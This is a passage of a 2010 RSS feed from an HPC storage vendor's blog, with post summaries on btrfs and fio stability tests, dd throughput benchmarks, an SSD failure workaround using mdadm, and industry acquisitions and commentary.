      <link>https://blog.scalability.org/2010/11/ot-its-rare-that-i-see-an-economic-analysis-so-spot-on/</link>
      <pubDate>Mon, 01 Nov 2010 16:13:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ot-its-rare-that-i-see-an-economic-analysis-so-spot-on/</guid>
      <description>Saw this, this morning. There was news over the past few weeks of tax avoidance strategies by Google and others. Criticism appears to have been muted at the political level, where they are avid funders of elected officials&amp;rsquo; re-election bids. Go figure. But this article points out some of the real details behind the headlines, and talks about job creation in general. Something that #RickForMI is likely painfully aware of (assuming he wins the governor race tomorrow).</description>
    </item>
    
    <item>
      <title>BTRFS is effectively stable</title>
      <link>https://blog.scalability.org/2010/10/btrfs-is-effectively-stable/</link>
      <pubDate>Fri, 29 Oct 2010 16:39:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/btrfs-is-effectively-stable/</guid>
      <description>Yeah, I know, the web page says it&amp;rsquo;s under heavy development. And its on-disk format can change. And its mailing list is chock full of patches. But it passed our stability test. 100 iterations (3.2TB written/read in all and compared to checksums) of the following fio test case.
[global]
size=8g
iodepth=32
blocksize=1m
numjobs=4
nrfiles=1
ioengine=vsync
rw=write

[sw1]
create_serialize=0
create_on_open=1
#directory=/data
directory=/mnt/btrfs
verify=crc32c-intel
verify_async=8
group_reporting

This is our baseline test.</description>
    </item>
    
    <item>
      <title>Current &#34;fastest&#34; supercomputer is ... APU powered !</title>
      <link>https://blog.scalability.org/2010/10/current-fastest-supercomputer-is-apu-powered/</link>
      <pubDate>Thu, 28 Oct 2010 14:33:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/current-fastest-supercomputer-is-apu-powered/</guid>
      <description>Go figure. Between 6 and 3 years ago, when we were pitching HPC accelerators to VCs, trying to convince them that it was inevitable that supercomputing was going this route, we (optimistically) predicted that the world&amp;rsquo;s fastest machine would be Accelerator Processing Unit (APU) based in 2012. Well, we were wrong. November 2010 is the correct answer. My expectation is that many HPC systems (probably most) will have some sort of APU technology (GPUs, vector extensions, Larrabee like things, Tilera like things).</description>
    </item>
    
    <item>
      <title>Running some btrfs (vs xfs) tests on 2.6.36</title>
      <link>https://blog.scalability.org/2010/10/running-some-btrfs-vs-xfs-tests-on-2-6-36/</link>
      <pubDate>Tue, 26 Oct 2010 20:29:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/running-some-btrfs-vs-xfs-tests-on-2-6-36/</guid>
      <description>Interesting results thus far, but not quite what I expected. Doing our acid test (reading and writing 8 threads of 8GB each for 64GB per read/write test, 100 times, with crc checking turned on). If btrfs doesn&amp;rsquo;t crash the kernel, and doesn&amp;rsquo;t start tossing CRC errors, yeah, it&amp;rsquo;s safe to use then (though we will throw the real octobonnie and hexadecabonnie loads at it).</description>
    </item>
    
    <item>
      <title>again ... seriously busy ...</title>
      <link>https://blog.scalability.org/2010/10/again-seriously-busy/</link>
      <pubDate>Mon, 25 Oct 2010 00:06:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/again-seriously-busy/</guid>
      <description>SC10 prep, machine builds/tests, quotes, yadda yadda &amp;hellip; Will have a number of posts up soon, in the next few days.</description>
    </item>
    
    <item>
      <title>Half open drivers ... OFED stacks with verbs ABIs that don&#39;t match the kernel&#39;s verb ABI ...</title>
      <link>https://blog.scalability.org/2010/10/half-open-drivers-ofed-stacks-with-verbs-abis-that-dont-match-the-kernels-verb-abi/</link>
      <pubDate>Thu, 14 Oct 2010 03:27:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/half-open-drivers-ofed-stacks-with-verbs-abis-that-dont-match-the-kernels-verb-abi/</guid>
      <description>I just ran through another update exercise. IB cards, OFED stack. GlusterFS atop this. Cards are a well known vendor&amp;rsquo;s cards. They work pretty well. But &amp;hellip; only with very specific kernels. Other kernels need not apply. Our 2.6.32.22 kernel is pretty darned fast (so our customers tell us). Now let&amp;rsquo;s build the OFED 1.5.2 &amp;hellip; and see what happens &amp;hellip;
To make a long story short, we wound up abandoning that approach.</description>
    </item>
    
    <item>
      <title>2 ... no 3! new resellers in the past week</title>
      <link>https://blog.scalability.org/2010/10/2-no-3-new-resellers-in-the-past-week/</link>
      <pubDate>Thu, 14 Oct 2010 03:14:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/2-no-3-new-resellers-in-the-past-week/</guid>
      <description>Been a very busy beaver, even with a broken finger. We now have 3 new resellers. We&amp;rsquo;ll have this info up on a page soon at the day job. One very well known group in edu/research, another helped us get our first NOAA sale, and another is headed up by a former colleague from SGI/Cray days. Very exciting times!</description>
    </item>
    
    <item>
      <title>How cool is this ...</title>
      <link>https://blog.scalability.org/2010/10/how-cool-is-this/</link>
      <pubDate>Thu, 07 Oct 2010 20:46:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/how-cool-is-this/</guid>
      <description>Customer&amp;rsquo;s machine went down. They have a spare (buy them in pairs). Needed us to look at it. Set their unit up to boot from a virtual CD over the IPMI port. Pointed that virtual CD at a bootserver we had built in a VM. Poked some holes in the firewall. And voila. The machine about 1400 miles away is up and booted, using the bootserver, and we are looking into the failure (looks to be temperature related &amp;hellip; go figure). Yeah, it was a little slow, but that&amp;rsquo;s fine for the moment.</description>
    </item>
    
    <item>
      <title>Interesting customer feedback</title>
      <link>https://blog.scalability.org/2010/10/interesting-customer-feedback/</link>
      <pubDate>Thu, 07 Oct 2010 00:19:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/interesting-customer-feedback/</guid>
      <description>One little single chassis JR4 apparently is a bit faster, at being a NAS, than a 6 shelf product from [some other scale out NAS vendor, a rather well known one]. This vendor is currently the rage in NGS circles. We know we are fast. We knew the other folks weren&amp;rsquo;t so fast. I am &amp;hellip; I guess &amp;hellip; not surprised &amp;hellip; to hear this. There are benchmarks. And then there is the real world.</description>
    </item>
    
    <item>
      <title>Raw, uncompromising, unapologetic ... firepower</title>
      <link>https://blog.scalability.org/2010/10/raw-uncompromising-unapologetic-firepower/</link>
      <pubDate>Thu, 07 Oct 2010 00:06:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/raw-uncompromising-unapologetic-firepower/</guid>
      <description>Latest Scalable Informatics high performance JR4 test runs &amp;hellip; untuned. I should say, imagine a rack full of 10 of these, with a functional IB QDR fabric behind them. Makes for a nice 23 GB/s (best case) per rack cluster file system platform.
[root@localhost ~]# dd if=/dev/zero of=/data/big.file ...
2450+0 records in
2450+0 records out
82208358400 bytes (82 GB) copied, 36.4844 seconds, 2.3 GB/s
[root@localhost ~]# dd of=/dev/null if=/data/big.file ...
2450+0 records in
2450+0 records out
82208358400 bytes (82 GB) copied, 37.</description>
    </item>
    
    <item>
      <title>Our friends at Pervasive Software, showing Smith Waterman results</title>
      <link>https://blog.scalability.org/2010/10/our-friends-at-pervasive-software-showing-smith-waterman-results/</link>
      <pubDate>Fri, 01 Oct 2010 14:06:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/our-friends-at-pervasive-software-showing-smith-waterman-results/</guid>
      <description>While I am pleased to see them in the news, and they are showing how their technology works well on a multi core system &amp;hellip; I guess I am troubled by something. Maybe it was the run on the SGI Altix unit. You don&amp;rsquo;t expect many of those to be around. Maybe it was the 30x performance gap over the CUDASW++. Which suggests that 30 nodes with 2 Teslas each could match the results obtained, at a fraction of the cost, power, floor space, cooling budget.</description>
    </item>
    
    <item>
      <title>IBM grabs Blade Networks</title>
      <link>https://blog.scalability.org/2010/10/ibm-grabs-blade-networks/</link>
      <pubDate>Fri, 01 Oct 2010 13:47:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/ibm-grabs-blade-networks/</guid>
      <description>Again, M&amp;amp;A on a roll. Larger vendors going for the &amp;ldquo;integrated&amp;rdquo; stack. I won&amp;rsquo;t comment on whether or not a single vendor is a good idea for anything &amp;hellip; there are several recent examples of a single vendor with a change of business direction resulting in a rather large and extended &amp;ldquo;oh-feces&amp;rdquo; situation for their now former HPC clientèle. There are economies of scale, there are synergies. One company cannot hope to do everything well for all customers.</description>
    </item>
    
    <item>
      <title>The business side of things ...</title>
      <link>https://blog.scalability.org/2010/09/the-business-side-of-things/</link>
      <pubDate>Thu, 30 Sep 2010 00:49:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/the-business-side-of-things/</guid>
      <description>Doing more siCluster quotes per day than I thought I would be at this stage. Each unit in the JackRabbit JR4 based siCluster sustains well over 2GB/s to and from disk for TB sized files. Some of the benchmarks we&amp;rsquo;ve seen suggest strongly that &amp;lsquo;competitive&amp;rsquo; solutions require many more of their systems to achieve bandwidth and application performance parity, which turns the already unfavorable price performance comparison into a rout. We are hearing from customers deploying JackRabbit units in ways we didn&amp;rsquo;t originally intend, now indicating that they scale quite a bit better than their modern (insert enterprise NAS vendors here) NAS system.</description>
    </item>
    
    <item>
      <title>More M&amp;A in HPC</title>
      <link>https://blog.scalability.org/2010/09/more-ma-in-hpc/</link>
      <pubDate>Wed, 29 Sep 2010 09:34:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/more-ma-in-hpc/</guid>
      <description>Hearing more M&amp;amp;A rumors, can&amp;rsquo;t say who. This is the time to buy, get the deal done now before the prices rise.</description>
    </item>
    
    <item>
      <title>OT: Learning how to work with only one hand</title>
      <link>https://blog.scalability.org/2010/09/ot-learning-how-to-work-with-only-one-hand/</link>
      <pubDate>Wed, 29 Sep 2010 09:32:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ot-learning-how-to-work-with-only-one-hand/</guid>
      <description>I have a cast on from my hand surgery last week. I have a new metal plate attached to my bone. Learning to be a southpaw isn&amp;rsquo;t easy. I get the cast off this morning. Should be fun. Then the PT starts. This is one of the very few forms of socially and legally acceptable torture on the planet.</description>
    </item>
    
    <item>
      <title>IBM grabs Netezza</title>
      <link>https://blog.scalability.org/2010/09/ibm-grabs-netezza/</link>
      <pubDate>Fri, 24 Sep 2010 03:05:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ibm-grabs-netezza/</guid>
      <description>IBM is acquiring Netezza for $1.7B USD. This can be an interesting play in massive OLAP and BI, both of which resist calling themselves HPC, but most definitely are. M&amp;amp;A is continuing to heat up, folks. The big guys are buying the little guys. [update] &amp;hellip; and of course there is weirdness &amp;hellip; according to a lawsuit, Netezza allegedly reverse engineered someone else&amp;rsquo;s product &amp;hellip; incorrectly at that &amp;hellip; and sold it to its customers.</description>
    </item>
    
    <item>
      <title>Great concept from the UK ...</title>
      <link>https://blog.scalability.org/2010/09/great-concept-from-the-uk/</link>
      <pubDate>Thu, 23 Sep 2010 04:46:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/great-concept-from-the-uk/</guid>
      <description>We should replicate it here. From the article.
I&amp;rsquo;ve mentioned it many times, but the primary driver of significant sea changes are cost issues. Cloud and open source are both mechanisms for reducing desktop application costs. Similar pressures are in place in HPC. Cloud HPC is currently mostly an overflow computing model, with some folks using it for primary computing. I expect more to start using these for primary computing, along with their super desktops.</description>
    </item>
    
    <item>
      <title>OT: what my hand looks like (x-ray)</title>
      <link>https://blog.scalability.org/2010/09/ot-what-my-hand-looks-like-x-ray/</link>
      <pubDate>Tue, 21 Sep 2010 18:58:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ot-what-my-hand-looks-like-x-ray/</guid>
      <description>Not gross, but if you are a little squeamish, don&amp;rsquo;t click the picture for the big one. Here&amp;rsquo;s the small image.
[ ](http://scalability.org/images/joes_hand_broken_marked.jpg)
The green arrows, hand drawn by me, should show the two problems. First is on the left of the image, a chunk of the knuckle has been broken off. Yeah, that hurts. But the other arrow, on the right hand side, explains why it hurts when it is straight.</description>
    </item>
    
    <item>
      <title>Every time I upgrade an OS ... every single time ...</title>
      <link>https://blog.scalability.org/2010/09/every-time-i-upgrade-an-os-every-single-time/</link>
      <pubDate>Mon, 20 Sep 2010 14:08:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/every-time-i-upgrade-an-os-every-single-time/</guid>
      <description>Java and its connection to browsers break. Now normally, I wouldn&amp;rsquo;t care, as I don&amp;rsquo;t personally have a very high opinion of the be-all-and-end-all language/system known as Java. It&amp;rsquo;s overly verbose, underperforming, and doesn&amp;rsquo;t play well with any operating system. Copy/paste buffers &amp;hellip; well, there is a whole huge litany of issues with it, and I am not even remotely the only one who has them. Updated desktop OS. Now at Ubuntu 10.</description>
    </item>
    
    <item>
      <title>Cost/risk benefit analysis</title>
      <link>https://blog.scalability.org/2010/09/costrisk-benefit-analysis/</link>
      <pubDate>Sat, 18 Sep 2010 16:23:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/costrisk-benefit-analysis/</guid>
      <description>There are costs to taking specific actions, there are risks, and there may be benefits. Here is an example of a risk (or cost) Q: what do you get when you spar (e.g. fight in a controlled manner so as to work on technique) with a 3rd dan (3rd degree blackbelt), and then mess up on a kick block? A: a broken middle finger on the right hand So typing is now hunt and peck.</description>
    </item>
    
    <item>
      <title>The missing middle, a marketing term, but a real problem</title>
      <link>https://blog.scalability.org/2010/09/the-missing-middle-a-marketing-term-but-a-real-problem/</link>
      <pubDate>Thu, 16 Sep 2010 17:04:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/the-missing-middle-a-marketing-term-but-a-real-problem/</guid>
      <description>If you listen to IDC talk about HPC, they will talk about &amp;ldquo;the missing middle&amp;rdquo;, which is basically a marketing term for a market segment that isn&amp;rsquo;t being well addressed by HPC vendors with clusters. It is being addressed by some (hint: the day job) in a variety of ways. An article at InsideHPC by Rich Brueckner gave it a good contextual background, in terms of historical trends in HPC tending to favor the lower cost deployments of processing power.</description>
    </item>
    
    <item>
      <title>On benchmarking in general</title>
      <link>https://blog.scalability.org/2010/09/on-benchmarking-in-general/</link>
      <pubDate>Thu, 16 Sep 2010 05:05:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/on-benchmarking-in-general/</guid>
      <description>I wonder if the reason there are so many bad benchmarks and incorrect conclusions drawn from bad benchmarks comes, to some significant level, from a basic misunderstanding of measurement: how to perform it, and what you are measuring. Several years ago, we watched folks who should know better insist that 2GB bonnie++ data (the 2GB file size) was the only relevant one for their storage systems, and that it told them everything they needed to know about storage.</description>
    </item>
    
    <item>
      <title>Interesting post on benchmarking</title>
      <link>https://blog.scalability.org/2010/09/interesting-post-on-benchmarking/</link>
      <pubDate>Tue, 14 Sep 2010 23:25:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/interesting-post-on-benchmarking/</guid>
      <description>Here. In it, the author makes a number of points. Some I take no issue with, or don&amp;rsquo;t have direct knowledge of. Others &amp;hellip;
Erp &amp;hellip; You only get the &amp;ldquo;faster&amp;rdquo; speeds with easily compressible data. You get the far slower speeds when the data isn&amp;rsquo;t so easy to compress. We know. We measured this, and observed it. If you write all zeros, just like in the days when compilers special cased particular codes (cough cough), it&amp;rsquo;s possible disks don&amp;rsquo;t even do the writes.</description>
    </item>
    
    <item>
      <title>The SSDs that failed</title>
      <link>https://blog.scalability.org/2010/09/the-ssds-that-failed/</link>
      <pubDate>Tue, 14 Sep 2010 19:46:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/the-ssds-that-failed/</guid>
      <description>The OEM went silent. We reported the issues, opened RMAs. To say I am not pleased &amp;hellip; well &amp;hellip; These are Corsair CMFSSD-32D1 units. According to their site
Ummm &amp;hellip; no. Not even close. We are experiencing about a 70% failure rate, within 3 months of acquisition. In many different chassis, in many different parts of the world, with many different power supplies, many different motherboards. This is a time correlated failure.</description>
    </item>
    
    <item>
      <title>no rest for the wicked ...</title>
      <link>https://blog.scalability.org/2010/09/no-rest-for-the-wicked/</link>
      <pubDate>Mon, 13 Sep 2010 21:02:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/no-rest-for-the-wicked/</guid>
      <description>busy busy busy busy &amp;hellip;.</description>
    </item>
    
    <item>
      <title>SSD failure issue explained</title>
      <link>https://blog.scalability.org/2010/09/ssd-failure-issue-explained/</link>
      <pubDate>Sun, 12 Sep 2010 03:53:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ssd-failure-issue-explained/</guid>
      <description>I think I understand most of it. The OEM went dark on communicating with us. This is unfortunate. I really wish they hadn&amp;rsquo;t. Suffice it to say we are replacing all of the units of theirs we have in field. We have documentation up on our documentation site on how to do the swap out. It appears to be a bad batch. I am guessing (until we learn otherwise) that they got some bad silicon at some point.</description>
    </item>
    
    <item>
      <title>9/11 memoriam</title>
      <link>https://blog.scalability.org/2010/09/911-memorium/</link>
      <pubDate>Sat, 11 Sep 2010 14:09:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/911-memorium/</guid>
      <description>Not an HPC topic, but one that all Americans can reflect upon &amp;hellip; their thoughts, their experiences &amp;hellip; and to resolve not to let this happen ever again, in any form. Never again. I had left SGI, and was working for a smaller engineering software company. I had lined up a bunch of interviews for an open position we had. My buddy Al was flying out from NY with his team to visit someone I know in Ann Arbor, and I was going to try to grab them for lunch or dinner.</description>
    </item>
    
    <item>
      <title>Oracle and Netapp bury the ZFS patent hatchet</title>
      <link>https://blog.scalability.org/2010/09/oracle-and-netapp-bury-the-zfs-patent-hatchet/</link>
      <pubDate>Fri, 10 Sep 2010 13:14:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/oracle-and-netapp-bury-the-zfs-patent-hatchet/</guid>
      <description>Color me skeptical. I don&amp;rsquo;t think there has been an actual resolution of the core issues, just an agreement to abstain from legal hostilities. See this article for some information. ZFS will continue as a patent encumbered software stack, and since no resolution exists between Oracle and Netapp, Netapp could, potentially, press its claims against any other customer/user of ZFS. This isn&amp;rsquo;t a good thing for anyone using or contemplating using ZFS, from any source other than Oracle.</description>
    </item>
    
    <item>
      <title>... and the day job desktop disk blowed up ...</title>
      <link>https://blog.scalability.org/2010/09/and-the-day-job-desktop-disk-blowed-up/</link>
      <pubDate>Thu, 09 Sep 2010 02:01:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/and-the-day-job-desktop-disk-blowed-up/</guid>
      <description>Well, the OS drive did anyway. The home directory data is happily living on the RAID unit. Curiously, we just got our BackupPC based backup unit set up, and it was backing this unit up &amp;hellip; Oh well. No great loss, apart from setup time for the new OS drive(s). Will do a software RAID 1 this time. And likely make it an SSD pair.</description>
    </item>
    
    <item>
      <title>Ceph updates</title>
      <link>https://blog.scalability.org/2010/09/ceph-updates/</link>
      <pubDate>Mon, 06 Sep 2010 15:34:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ceph-updates/</guid>
      <description>rbd is in testing. Have a look at the link, but here are some of the highlights
   * network block device backed by objects in the Ceph distributed object store (rados)
   * thinly provisioned
   * image resizing
   * image export/import/copy/rename
   * read-only snapshots
   * revert to snapshot
   * Linux and qemu/kvm clients

We are doing something like this now, to a degree, with a mashup of tools in our target.</description>
    </item>
    
    <item>
      <title>Day job has a &#34;Cash for Clunkers&#34; program up</title>
      <link>https://blog.scalability.org/2010/09/day-job-has-a-cash-for-clunkers-program-up/</link>
      <pubDate>Mon, 06 Sep 2010 13:18:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/day-job-has-a-cash-for-clunkers-program-up/</guid>
      <description>For those who don&amp;rsquo;t get the reference, &amp;ldquo;Cash for Clunkers&amp;rdquo; is a colloquialism for a hardware trade-in program for old gear. PR is here, and direct link to the site itself here. Basically, we&amp;rsquo;ll take old [HPC] storage gear and provide a discount to you for trading in this old gear. There are limitations on which old gear qualifies; it must be operational and in working order, etc. Also, you are responsible for shipping costs.</description>
    </item>
    
    <item>
      <title>We&#39;ve come a long way in 13 years ...</title>
      <link>https://blog.scalability.org/2010/09/weve-come-a-long-way-in-13-years/</link>
      <pubDate>Sat, 04 Sep 2010 15:08:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/weve-come-a-long-way-in-13-years/</guid>
      <description>Have a look at today&amp;rsquo;s Google home page, and you see the 25th anniversary of buckyballs, aka fullerene, which are particular structures made out of carbon. These fullerenes are very much related to graphite (pencil &amp;ldquo;lead&amp;rdquo;), and have some very interesting physics and chemistry of their own. They were discovered when I was in my Sophomore/Junior years as an undergraduate. Not feeling old. Nosiree. This isn&amp;rsquo;t what the post is about, and yes, there is a huge connection to HPC.</description>
    </item>
    
    <item>
      <title>Passing of torches in the industry</title>
      <link>https://blog.scalability.org/2010/09/passing-of-torches-in-the-industry/</link>
      <pubDate>Fri, 03 Sep 2010 03:24:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/passing-of-torches-in-the-industry/</guid>
      <description>One constant in the world is change. You can fear it, or learn to embrace it. This is part of all markets, HPC and many others. This morning we woke to news that Rich Brueckner bought InsideHPC. Rich is a good reporter and writer, has a marketing firm, and has been working in HPC for a while. We spent time as colleagues at SGI/Cray (yeah, its been a while). Rich now owns one of the brightest brands in HPC news and information.</description>
    </item>
    
    <item>
      <title>Workaround for the SSD RAID1 dual drive failure mode</title>
      <link>https://blog.scalability.org/2010/09/workaround-for-the-ssd-raid1-dual-drive-failure-mode/</link>
      <pubDate>Wed, 01 Sep 2010 21:11:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/workaround-for-the-ssd-raid1-dual-drive-failure-mode/</guid>
      <description>At least it can keep things operating while we get parts out. Shipped a number today, placed another order for the new vendor&amp;rsquo;s drives. I can confirm that heat is an issue with SSDs.
As root, on the unit, decide where you are going to place an image, then

dd if=/dev/zero of=/path/to/loopback/raid.img bs=1 count=1 seek=32G
losetup /dev/loop0 /path/to/loopback/raid.img
mdadm --grow /dev/md0 -n3
mdadm /dev/md0 --add /dev/loop0

This will copy the OS to a file, and we can (later if need be) recover from problems.</description>
    </item>
    
    <item>
      <title>Never seen anything like this before.  Ever.</title>
      <link>https://blog.scalability.org/2010/08/never-seen-anything-like-this-before-ever/</link>
      <pubDate>Tue, 31 Aug 2010 21:09:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/never-seen-anything-like-this-before-ever/</guid>
      <description>[update] I am starting to think some of these things are heat issues. Not generated heat, but ambient heat. I took a pair of SSDs from our lab (running quite warm, 5 ton AC unit ready to be hooked up) which were giving minor read errors (different vendor), and they operated flawlessly in my basement lab (quite cold) hmmmm&amp;hellip;.. I see some SSDs being sacrificed in the near future. I am starting to wonder if any of them has been actually tested in the higher heat environments.</description>
    </item>
    
    <item>
      <title>Tiburon, now with booting over iSCSI</title>
      <link>https://blog.scalability.org/2010/08/tiburon-now-with-booting-over-iscsi/</link>
      <pubDate>Sat, 28 Aug 2010 20:00:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/tiburon-now-with-booting-over-iscsi/</guid>
      <description>Woot &amp;hellip; have it working nicely in the lab. A few more tweaks to the environment, and we should be able to test in the field. We&amp;rsquo;ve been comparing NFS booting, iSCSI booting, and ramdisk based booting for siCluster systems. We&amp;rsquo;ve been wanting to do more than PXE loads, and to provide multiple levels of resiliency, which a technology like this lets us do. As it turns out, this dovetails beautifully into how we load our JackRabbit and DeltaV units in siCluster.</description>
    </item>
    
    <item>
      <title>Preparing for a new JackRabbit benchmark report</title>
      <link>https://blog.scalability.org/2010/08/preparing-for-a-new-jackrabbit-benchmark-report/</link>
      <pubDate>Fri, 27 Aug 2010 12:57:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/preparing-for-a-new-jackrabbit-benchmark-report/</guid>
      <description>We&amp;rsquo;ve been gathering data on the new machine. So far, it has exceeded our expectations a bit. It&amp;rsquo;s one of, if not the, fastest &amp;hellip; and not by a little bit mind you &amp;hellip; spinning rust 24 drive SATA 2 servers we&amp;rsquo;ve seen in the market. Obviously we are happy with this. Gathering more data. Will report soon.</description>
    </item>
    
    <item>
      <title>Start popping the pop-corn, this is getting interesting to watch ...</title>
      <link>https://blog.scalability.org/2010/08/start-popping-the-pop-corn-this-is-getting-interesting-to-watch/</link>
      <pubDate>Fri, 27 Aug 2010 12:52:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/start-popping-the-pop-corn-this-is-getting-interesting-to-watch/</guid>
      <description>Outright bidding war between Dell and HP for 3Par. HP topped Dell&amp;rsquo;s bid, so Dell responded. Press releases were released. They continued to walk down the aisle. And then HP upped its bid. Currently at $1.8B and climbing. Thinking about HP&amp;rsquo;s strategy, I wonder if they really want 3PAR or if they really want to deny Dell the company. And how much the latter is worth to HP. They have some competitive technology in their portfolio.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-08-27</title>
      <link>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-27/</link>
      <pubDate>Fri, 27 Aug 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-27/</guid>
      <description>* New revision of #[scalableinformatics](http://search.twitter.com/search?q=%23scalableinformatics) #jackrabbit JR4 machine is positively roaring. &amp;gt; 2GB/s sustained read/write on 1TB writes/reads [#](http://twitter.com/sijoe/statuses/22183531579)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>Lustre 1.8.4 and 2.0 have been released</title>
      <link>https://blog.scalability.org/2010/08/lustre-1-8-4-and-2-0-have-been-released/</link>
      <pubDate>Thu, 26 Aug 2010 20:59:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/lustre-1-8-4-and-2-0-have-been-released/</guid>
      <description>Normally would suggest going to the Lustre site for details, though it hasn&amp;rsquo;t rolled over yet. So look here for 1.8.4 download, and here for 2.0 download. The 2.0 GA release has a changelog which is sparse, but to be expected. The 1.8.4 GA release changelog is here.</description>
    </item>
    
    <item>
      <title>More updated JackRabbit benchmark pr0n: bonnie&#43;&#43;</title>
      <link>https://blog.scalability.org/2010/08/more-updated-jackrabbit-benchmark-pr0n-bonnie/</link>
      <pubDate>Thu, 26 Aug 2010 17:45:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/more-updated-jackrabbit-benchmark-pr0n-bonnie/</guid>
      <description>Again, this is our 5th generation JackRabbit unit, sold as individual servers or in siCluster storage clusters. Baseline bonnie++ results. Remember, I am not a fan of using this as a test engine, as I&amp;rsquo;ve noted in the blog a few times. Very basic, very simple test. Machine has 144GB ram, so we need to write 288GB for the test. It is configured for streaming IO, not random IO. RAID6&amp;rsquo;s, not RAID0.</description>
    </item>
    
    <item>
      <title>Untuned basic time trials</title>
      <link>https://blog.scalability.org/2010/08/untuned-basic-time-trials/</link>
      <pubDate>Thu, 26 Aug 2010 15:03:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/untuned-basic-time-trials/</guid>
      <description>So we have a new generation (5th) JackRabbit in the lab, for a financial services customer. Have lots of similar machines out to bid for next generation sequencing (NGS), and many other things. This is the initial bring-up test run. I think you might like these numbers. First off, configuration:
 RAID6 volumes. These are NOT RAID0. I want to emphasize this. Primary storage are SATA 2 drives at 7200 RPM.</description>
    </item>
    
    <item>
      <title>Going to the test track tomorrow ...</title>
      <link>https://blog.scalability.org/2010/08/going-to-the-test-track-tomorrow/</link>
      <pubDate>Wed, 25 Aug 2010 18:59:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/going-to-the-test-track-tomorrow/</guid>
      <description>&amp;hellip; building what is arguably the fastest JR4 unit to date, for a customer in financial services. Those folks really seem to like us. I&amp;rsquo;ll update as soon as I can. Should be interesting (barring any issues). Will do some baseline speed trials, and if things look good, we&amp;rsquo;ll hit the accelerator hard and see what it can do.</description>
    </item>
    
    <item>
      <title>Echoing what I&#39;ve said here many times ...</title>
      <link>https://blog.scalability.org/2010/08/echoing-what-ive-said-here-many-times/</link>
      <pubDate>Wed, 25 Aug 2010 14:16:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/echoing-what-ive-said-here-many-times/</guid>
      <description>Good article by Declan McCullagh at CNET. By all means, read it all, but here are some choice quotes:
If you adopt an overtly business-hostile tax and regulatory regime, such as here in Michigan, you are going to drive businesses away, and cause those that are here to rethink investment. In growth, in people, &amp;hellip; I am still trying to wrap my brain around Obamacare, and what it means to us as a small company.</description>
    </item>
    
    <item>
      <title>For the cloud business model to work, this can&#39;t happen</title>
      <link>https://blog.scalability.org/2010/08/for-the-cloud-business-model-to-work-this-cant-happen/</link>
      <pubDate>Tue, 24 Aug 2010 14:21:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/for-the-cloud-business-model-to-work-this-cant-happen/</guid>
      <description>[
Microsoft hit by cloudy downtime in US Two-hour outage for some hosted services  ](http://www.theregister.co.uk/2010/08/24/microsoft_bpos_us_outage/) One very important leg that cloud stands upon is &amp;ldquo;I can get to my data and applications no matter what&amp;rdquo; subject to the availability of networking and clients capable of reaching that data. Sort of like &amp;ldquo;I can drive to Traverse City, no matter what&amp;rdquo;, subject to the availability of fuel and passable roads between where ever you are and Traverse City.</description>
    </item>
    
    <item>
      <title>Curiouser and curiouser ... HP tries to outbid Dell for 3Par</title>
      <link>https://blog.scalability.org/2010/08/curiouser-and-curiouser-hp-tries-to-outbid-dell-for-3par/</link>
      <pubDate>Tue, 24 Aug 2010 14:10:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/curiouser-and-curiouser-hp-tries-to-outbid-dell-for-3par/</guid>
      <description>Saw this one this morning. From the article &amp;hellip;
Bidding war? I&amp;rsquo;ve said the M&amp;amp;A is gonna get more interesting going forward.</description>
    </item>
    
    <item>
      <title>I know, lets fix an obvious software issue by redefining reality ...</title>
      <link>https://blog.scalability.org/2010/08/i-know-lets-fix-an-obvious-software-issue-by-redefining-reality/</link>
